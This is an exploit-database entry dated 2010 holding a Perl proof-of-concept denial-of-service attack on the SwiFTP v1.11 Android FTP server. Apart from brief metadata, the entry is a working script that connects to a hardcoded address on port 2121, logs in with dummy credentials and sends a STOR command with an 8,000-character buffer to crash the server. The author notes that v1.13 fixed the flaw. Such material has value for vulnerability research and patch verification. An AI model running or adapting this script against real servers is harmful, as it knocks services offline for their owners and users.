SwiFTP v1.11 Overflow Dos PoC

2010-01-13T00:00:00
ID 1337DAY-ID-10073
Type zdt
Reporter Julien Bedard
Modified 2010-01-13T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            =============================
SwiFTP v1.11 Overflow Dos PoC
=============================

# Exploit Title: SwiFTP v1.11 Overflow Dos PoC
# Software Link: http://swiftp.googlecode.com/files/SwiFTP_1.11.apk
# Version: v1.11
# Tested on: Android OS G1 Rogers / Rooted (CyanogenMod-4.0.4)
 
 
#!/usr/bin/perl
############
#
# Simple Dos Crap for the Android app : SwiFTP Server v1.11
# by Julien Bedard
#
# This DoS have been patched in the new version that's why
# I'm releasing it.
#
# SwiFTP Server v1.11 --> Vulnerable
# SwiFTP Server v1.13 --> Patched
#
####################################
 
use IO::Socket::INET;
 
$overflow = 'A' x 8000;
 
$ftpraw=IO::Socket::INET->new("192.168.2.13:2121") or die;
 
print $ftpraw "user nouser\n";
print $ftpraw "pass nopass\n";
print $ftpraw "stor $overflow\n";
print $ftpraw "QUIT\n";
 
close $ftpraw;



#  0day.today [2016-04-19]  #